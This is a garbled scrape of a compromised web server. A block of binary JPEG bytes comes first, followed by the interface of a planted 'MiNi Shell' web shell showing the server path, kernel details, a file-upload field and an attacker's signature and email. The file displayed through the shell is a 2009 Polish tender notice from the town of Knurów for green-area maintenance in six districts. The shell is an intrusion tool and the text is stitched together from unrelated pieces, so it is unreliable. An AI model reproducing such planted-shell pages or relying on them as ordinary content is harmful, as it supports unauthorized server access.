JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090317/65358-N-2009.html

<p class="kh_header"><b>Knurów: USŁUGA KOMPLEKSOWEGO UTRZYMANIA I KONSERWACJI TERENÓW ZIELONYCH Z PODZIAŁEM MIASTA NA 6 REJONÓW</b><br>
<b>Numer ogłoszenia: 65358 - 2009; data zamieszczenia: 17.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Knurów , ul. dr. Floriana Ogana 5, 44-190 Knurów, woj. śląskie, tel. 032 3392308, faks 032 2351521.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGA KOMPLEKSOWEGO UTRZYMANIA I KONSERWACJI TERENÓW ZIELONYCH Z PODZIAŁEM MIASTA NA 6 REJONÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest kompleksowe utrzymanie i konserwacja terenów zielonych w podziale na następujące rejony:

1.1.REJON NR 1 o pow.11,00 ha w tym:
1.1.1.Plac 700-lecia przy ul. Al. Lipowej
1.1.2.Zieleń pom. ul. Al. Lipową , Kapelanów Wojskowych, MSP nr 7 i MSP nr 9
1.1.3.Zieleń wzdłuż ciągów pieszych:
- Witosa
- Lotników - Sikorskiego
- WP I-WP II 
1.1.4.Zieleniec przy ul. Piłsudczyków i Dyw. Kościuszkowskiej
1.1.5.Zieleń wzdłuż ul.1 Maja
1.1.6.Zieleń pomiędzy ul.1 Maja - Marynarzy
1.1.7.Ciąg zieleni wzdłuż ul. 26 Stycznia

Zakres usług:
- koszenie trawników - 4-ro krotne pow. 40.000 m2
- koszenie trawników - 5-cio krotne pow. 65.916 m2
- pielęgnacja żywopłotu miękkiego 3 razy 1.640 m2
- wiosenne wygrabienie trawników z zanieczyszczeń, i wywóz odpadów na zorganizowane wysypisko	65.916 m2
- jesienne grabienie liści i wywóz j/w (bez placu 700-lecia ) 65.916 m2
- pielęgnacja drzew piennych (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 44 szt
- pielęgnacja drzew i krzewów iglastych	57 szt
- odmłodzenie krzewów o średnicy pow. 2 m -3 razy	5 szt
- odmłodzenie krzewów o średnicy do 2 m - 3 razy	5 szt
- pielęgnacja krzewinek	10 szt 
- pielęgnacja krzewów liściastych 110 m2
- pielęgnacja krzewów żywopłotowych 135 szt
- usuwanie odrostów przy i z drzew 12 szt
- oczyszczenie i odchwaszczenie chodnika 370 m2
- bieżące utrzymanie terenu (łącznie z ciągami pieszymi) 110.000 m2
- malowanie ławek 15 szt
- naprawa ławek, uzupełnienie siedzisk, oparć i dybli (deski sosnowe)	10 szt kpl.

1.2.REJON NR 2 o pow. 8,1 ha w tym: 
1.2.1.Zieleń w ul. Szpitalnej
1.2.2.Zieleń wzdłuż ul.1 Maja (skarpa)
1.2.3.Zieleń wzdłuż ul. Kosmonautów i Szpitalnej do Ziętka
1.2.4.Plac zabaw przy ul. Kosmonautów 1-11
1.2.5.Zieleń i plac zabaw przy ul. Armii Krajowej
1.2.6.Zieleń wzdłuż ul. Szpitalnej (od Ziętka do stacji kontroli)
1.2.7.Zieleń od ul. Szpitalnej do Sikorskiego
1.2.8.Zieleń wzdłuż ul. Ułanów i MSP Nr 9
1.2.9.Teren zielony - oczko
1.2.10.Zieleniec przy ul. Jedności Narodowej

Zakres usług:
- koszenie trawników - 5-cio krotne pow. 41.466 m2 
- koszenie trawników - 6-cio krotne pow. 29.287 m2
- odmłodzenie żywopłotu miękkiego 3 razy 1.410 m2
- odmłodzenie krzewów o średnicy do 2 m - 3 razy 63 szt
- wiosenne wygrabienie trawników,wywóz zanieczyszczeń na zorganizowane wysypisko 70.753 m2
- pielęgnacja drzew  (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 139 szt 
- pielęgnacja drzew i krzewów iglastych 171 szt
- jesienne grabienie liści i wywóz na zorganizowane wysypisko	70.753 m2
- bieżące utrzymanie terenu łącznie z ciągami pieszymi, chodnikami, placem wypoczynkowym 81.655 m2
- odchwaszczenie ścieżki żwirowej i placu piaskowego 2 razy 841 m2
- odchwaszczenie ciągów pieszych, ścieżek i placu wypoczynkowego 8.161 m2
- zamiatanie naw. Conipur placu zabaw 1 raz w tyg. w okresie maj - listopad			 82 m2
- pielęgnacja kwietnika obsadzonego krzewinkami	 34 m2
- pielęgnacja krzewów liściastych 165 szt 
- pielęgnacja róż 464 szt
- pielęgnacja tawuł (krzewów liściastych)	 454 szt
- codzienne oczyszczanie nawierzchni żwirowych i piaskowych na placach zabaw		 1061m2
- dowóz i uzupełnienie ziemią urodzajną (kompostową) kwietnika obsadzonego różami	 18 m3
- malowanie ławek 39 szt
- mycie ławek z PCV 16 szt                                                      
- naprawa ławek,uzupełnianie siedzisk lub oparć (deski sosnowe)	20 szt                                                
- wymiana piasku w piaskownicach, usunięcie 30 cm warstwy brudnego piasku z odwozem i opłatą za składowanie oraz zakup i wypełnienie czystym piaskiem piaskownic -2 razy (piasek płukany z atestem) 40 m3
- uzupełnienie żwirem płukanym o grubości 2-8mm ścieżki żwirowej o pow.156 m2 warstwą 10 cm,plac zabaw A. Krajowej 15,6 m3
- usunięcie 30 cm warstwy brudnego piasku z podłoża placu  piaskowego placu zabaw A. Krajowej o pow.685 m2 wraz z odwozem i opłatą za składowanie oraz zakup i wypełnienie czystym piaskiem podłoży na głębokość 30 cm (piasek płukany z atestem)	 205 m3
- usunięcie 30 cm warstwy brudnego piasku z podłoża placu piaskowego na terenie Oczka wodnego o pow. 220 m2 wraz z odwozem i opłatą za składowanie oraz zakup i wypełnienie czystym piaskiem podłoży na głębokość 30 cm (piasek płukany z atestem)	 66 m3

1.3.REJON NR 3 o pow. 4,5 ha w tym: 
1.3.1.Zieleń przy ul.1 Maja 
1.3.2.Place zabaw przy ul. Mieszka I i Chrobrego
1.3.3.Zieleń wzdłuż ul. K. Wielkiego i S. Batorego
1.3.4.Ciąg ul. Mieszka I i Mieszka I boczne
1.3.5.Zieleń pomiędzy ul. Batorego a ul. Jagiełły
1.3.6.Zieleń pomiędzy ul. Batorego i Kosmonautów
1.3.7.Zieleń przed budynkiem K. Wielkiego 2 i trawnik wzdłuż parkingu targowiska
1.3.8.Zieleń na os. Redyna
1.3.9.Zieleń w ul. Szpitalnej 
1.3.10.Teren przy przepompowni ul. Wilsona i Wilsona 15

Zakres usług:
- koszenie trawników - 5-cio krotne pow. 2.610 m2
- odmłodzenie krzewów o średnicy do 2m - 3 razy	35 szt
- odmłodzenie krzewów o średnicy pow. 2m - 3 razy 39 szt
- wiosenne wygrabienie trawników, wywóz zanieczyszczeń na zorganizowane wysypisko 42.660 m2
- pielęgnacja drzew  (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 45 szt 
- pielęgnacja drzew i krzewów iglastych	41 szt
- jesienne grabienie liści i wywóz na zorganizowane wysypisko	42.660 m2
- usuwanie odrostów przy i z drzew niezależnie od grubości drzewa 39 szt
- bieżące utrzymanie terenu 45.000 m2
- zamiatanie naw. płytek wokół piaskownicy 1 raz w tyg. na placu zabaw ul. Chrobrego w okresie maj - listopad 50 m2
- pielęgnacja krzewów liściastych 115 szt 
- malowanie ławek 42 szt
- naprawa ławek,uzupełnianie siedzisk lub oparć (deski sosnowe)	30 szt
- wymiana piasku w piaskownicach, usunięcie 30 cm warstwy brudnego piasku z odwozem i opłatą za składowanie oraz zakup i wypełnienie czystym piaskiem piaskownic -2 razy (piasek płukany z atestem)	64 m3
- usunięcie 20 cm warstwy nagromadzonego piasku dookoła piaskownicy i przy ławkach na placu zabaw przy ul. Mieszka I , na szer.2 m , obwód piaskownicy 29mb,
- wywóz zebranego piasku na zorganizowane wysypisko 11,6 m3
- wyrównanie, wyprofilowanie terenu wokół piaskownicy 58 m2
- czyszczenie ścieku odwadniającego 1 raz w tyg. w okresie kwiecień - listopad		 150 mb
- oczyszczenie pow. przykrawężnikowych boiska na szer. 20 cm 138 mb
- amiatanie zatok,chodników z kostki  i ciągów pieszych z wywozem i utylizacją odpadów 1 raz w tyg. w okresie V-XI	2.498 m2

1.4.REJON NR 4 o pow. 5,1 ha w tym:
1.4.1.Park przy ul. Ogana
1.4.2.Parking przy ul. Kopalnianej
1.4.3.Zieleń przy ul. Dworcowej 2-10
1.4.4.Zieleń pomiędzy ul.1 Maja - Koziełka
1.4.5.Zieleń ul. Wilsona 3-5

Zakres usług:
- koszenie trawników 5-cio krotne pow. 48.142 m2
- odmłodzenie  żywopłotu miękkiego 3 razy 1.105 m2
- odmłodzenie krzewów o śr. korony do 2 m - 3razy 200 szt
- pielęgnacja róż 140 szt
- pielęgnacja drzew piennych (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 55 szt
- pielęgnacja drzew f. naturalnej 25 szt
- pielęgnacja drzew iglastych	8 szt
- usuwanie odrostów przy i z drzew niezależnie od grubości drzewa 20 szt
- wiosenne wygrabienie trawników i wywóz zanieczyszczeń na zorganizowane wysypisko 48.142 m2
- jesienne grabienie liści i wywóz j/w	48.142 m2
- bieżące utrzymanie terenu 51.000 m2
- czyszczenie ścieku odwadniającego 1 raz w tyg. 395 mb
- odchwaszczenie alejek żużlowych i z płytek - 2 razy 2.760 m2
- zamiatanie chodników i alejek z płytek 2 razy	2.760 m2
- malowanie ławek 77 szt
- naprawa ławek,uzupełnianie siedzisk lub oparć i dybli (deski sosnowe)	25szt kpl.
demontaż ławek	14 szt 
- wymiana piasku w piaskownicy (piasek płukany) 50 m3

1.5.REJON NR 5 o pow. 2,40 ha w tym: 
1.5.1.Zieleńce w ul. Dworcowej
1.5.2.Zieleniec i ciąg zieleni przy ul. Niepodległości 
1.5.3.Zieleniec przy ul. Dworcowej - Kopalnianej
1.5.4.Skwer przy ul. Plac Powstańców Śląskich
1.5.5.Nieczynny cmentarz przy ul. Koziełka

Zakres usług:
- koszenie trawników - 6-ro krotne pow.  13.223 m2
- odmłodzenie  żywopłotu miękkiego 3 razy 300 m2
- odmłodzenie krzewów o śr. korony do 2 m - 3 razy 3 szt
- pielęgnacja róż  368 szt 
- oprysk róż na mszyce	 368 szt
- oprysk róż na choroby grzybowe 368 szt
- jesienne wapnowanie róż  368 szt
- pielęgnacja krzewów liściastych 4.237 szt
- pielęgnacja różaneczników 43 szt
- pielęgnacja drzew i krzewów iglastych	218 szt
- pielęgnacja kwietników obsadzonych bylinami 90 m2
- uzupełnienie ściółki z kory pod krzewami			12 m3
- wiosenne wygrabienie trawników, wywóz zanieczyszczeń, na zorganizowane wysypisko 13.223 m2
- jesienne grabienie liści i wywóz j/w	23.353m2
- pielęgnacja drzew piennych i f. naturalnej (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 76 szt 
- usuwanie odrostów przy i z drzew niezależnie od grubości drzewa 81 szt
- bieżące utrzymanie terenu 23.906 m2
- zamiatanie alejek, placów, schodów, pochylni, ciągów pieszych,   chodników, nawierzchni z kostki	7.399 m2
- zamiatanie nawierzchni z płyt gumowych 104 m2
- odchwaszczanie alejek, placów, schodów, ciągów pieszych, chodników, nawierzchni z kostki 2 razy	 7.399 m2
- malowanie ławek 81 szt
- naprawa ławek,uzupełnianie siedzisk, oparć i dybli (deski sosnowe)	30 szt kpl.
- wymiana piasku w piaskownicy (piasek płukany) 15,5 m3
- zebranie nagromadzonego piasku wokół piaskownicy w pasie do 1 m 1,08 m3

1.6.REJON NR 6 o pow. 9,2 ha w tym: 
1.6.1.Zieleniec w ul. Michalskiego
1.6.2.Skwer przy ul. Staszica
1.6.3.Zieleń w ul. Al. Piastów
1.6.4.Teren przy ul. Sztygarskiej
1.6.5.Zieleniec przy ul. Lignozy
1.6.6.Skwer przy ul. Parkowej
1.6.7.Park przy ul. Parkowej

Zakres usług:
- koszenie trawników - 5-cio krotne pow.	74.300 m2
- koszenie trawników - 6-cio krotne 1.700 m2
- odmłodzenie  żywopłotu miękkiego 3 razy 3.900 m2
- odmłodzenie żywopłotu twardego 2 razy	150 m2
- odmłodzenie krzewów o śr. korony do 2m-3 razy 12 szt
- odmłodzenie krzewów o śr. korony pow.2m-3 razy 10 szt
- wiosenne wygrabienie trawników i wywóz zanieczyszczeń na zorganizowane wysypisko 39.400 m2
- jesienne grabienie liści i wywóz j/w	57.697m2
- pielęgnacja drzew piennych i f. naturalnej (łącznie z kontrolą i wymianą wiązadeł oraz uszkodzonych lub brakujących palików) 16 szt
- usuwanie odrostów przy i z drzew niezależnie od grubości drzewa 80 szt
- przycięcie krzewów starszych 2 razy 20 m2
- zamiatanie nawierzchni z kostki i asfaltobetonowej 8.895 m2
- bieżące utrzymanie terenu	89.200 m2
- oczyszczanie nawierzchni żwirowej i piaskowej placu zabaw	520 m2
- odchwaszczenie alejek żużlowych 2 razy 598 m2 
- malowanie ławek 77 szt
- naprawa ławek,uzupełnianie siedzisk, oparć i dybli (deski sosnowe)	35 szt kpl.
- wymiana piasku w piaskownicach (piasek płukany)  15 m3
- wymiana piasku na polu piaskowym (10cm) 17,3 m3
- wymiana nawierzchni żwirowej (10cm) 34,7 m3

2.Szczegółowe opisy i charakterystyki obiektów zieleni zawierają Załączniki nr 2 do projektów umów dla poszczególnych rejonów.

3. Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę maksymalnie na 2 wybrane rejony.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki, które powinni spełniać wykonawcy:
1. wykonawca winien spełniać warunki zawarte w art. 22 ust. 1 pkt 1-3 pzp oraz nie podlegać wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp.
2. wykonawca winien być uprawniony do występowania w obrocie prawnym,
3. wykonawca winien wykazać się w ciągu ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, wykonaniem/wykonywaniem co najmniej 1 zadania o wartości brutto minimum 40.000 zł w ciągu roku, odpowiadających swoim rodzajem usługom objętym przedmiotem zamówienia, za które to Zamawiający uzna prace polegające na utrzymaniu i konserwacji terenów zielonych (parków, zieleńców, skwerów terenów osiedlowych i wspólnot), utrzymaniu terenów wokół zakładów przemysłowych, ciągów ulicznych zieleni, pielęgnacji krzewów i drzew itp. 
4. wykonawca winien dysponować osobami zdolnymi do wykonania przedmiotowego zamówienia i wskazać kierownika prac posiadającego co najmniej wykształcenie średnie ogrodnicze, konserwacji terenów zielonych albo podobne (leśne, rolnicze) lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia w/w osoby,
5. wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50.000 zł.

2. Ocena spełniania ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach wyszczególnionych poniżej. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca winien załączyć do oferty:
1. oświadczenie, że spełnia warunki określone w art. 22 ust. 1 pkt 1-3 pzp 
2. oświadczenie, że nie podlega wykluczeniu z postępowania o zamówienie publiczne na podstawie art. 24 ust. 1 i 2 pzp,
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
4. wykaz wykonanych/wykonywanych prac w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością pracom stanowiącym przedmiot zamówienia, spełniających warunek określony w pkt 3 opisu warunków z podaniem wartości prac, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że prace te zostały wykonane należycie,
1.5.wskazanie osoby na stanowisko kierownika prac wraz z dokumentami potwierdzającymi posiadanie wymaganego wykształcenia (kserokopia świadectwa, dyplomu)- jeżeli wykonawca nią dysponuje lub będzie dysponował oraz pisemne zobowiązanie innego podmiotu do udostępnienia tej osoby, jeżeli wykonawca wykaże, że będzie nią dysponować,
1.6.polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50.000 zł..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.knurow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek wykonawcy w siedzibie zamawiającego - Wydział Zamówień Publicznych, pok. 53, w godz. 8:00 - 13:30 lub za zaliczeniem pocztowym po uiszczeniu opłaty na konto zamawiającego. Opłata 32,75 zł.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2009 godzina 10:30, miejsce: Urząd Miasta Knurów, ul. dr. F. Ogana 5, 44-190 Knurów, Wydział Zamówień Publicznych, pok. 53.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osobami uprawnionymi do porozumiewania się z wykonawcami są:
Naczelnik Wydziału Zamówień Publicznych - Grażyna Szweda, tel. (032) 339-23-08, Inspektor Wydziału Zamówień Publicznych - Monika Szczuk, tel. (032) 339-23-06.
Fax (032) 339-22-92,
e-mail zp@knurow.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com